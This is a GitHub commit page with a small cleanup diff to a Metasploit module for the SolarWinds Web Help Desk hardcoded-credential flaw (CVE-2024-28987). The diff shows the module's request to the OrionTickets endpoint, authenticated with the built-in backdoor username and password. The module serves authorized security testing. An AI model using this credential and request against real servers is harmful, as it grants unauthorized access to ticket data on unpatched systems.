Skip to content

Commit c34d20d

Browse files
committed
updated
updated
1 parent d950bf7 commit c34d20d

File tree

1 file changed

+1
-3
lines changed

1 file changed

+1
-3
lines changed

modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb

Lines changed: 1 addition & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -22,7 +22,6 @@ def initialize(info = {})
2222
['URL', 'https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987'],
2323
['URL', 'https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2'],
2424
['URL', 'https://www.horizon3.ai/attack-research/cve-2024-28987-solarwinds-web-help-desk-hardcoded-credential-vulnerability-deep-dive/'],
25-
2625
],
2726
'DisclosureDate' => '2024-08-22',
2827
'DefaultOptions' => {
@@ -59,14 +58,13 @@ def check
5958
end
6059

6160
def auth
62-
res = send_request_cgi(
61+
send_request_cgi(
6362
'method' => 'GET',
6463
'uri' => normalize_uri(target_uri.path, 'helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets'),
6564
'headers' => {
6665
'Authorization' => 'Basic ' + Rex::Text.encode_base64('helpdeskIntegrationUser:dev-C4F8025E7')
6766
}
6867
)
69-
res
7068
end
7169

7270
def run

0 commit comments

Comments
 (0)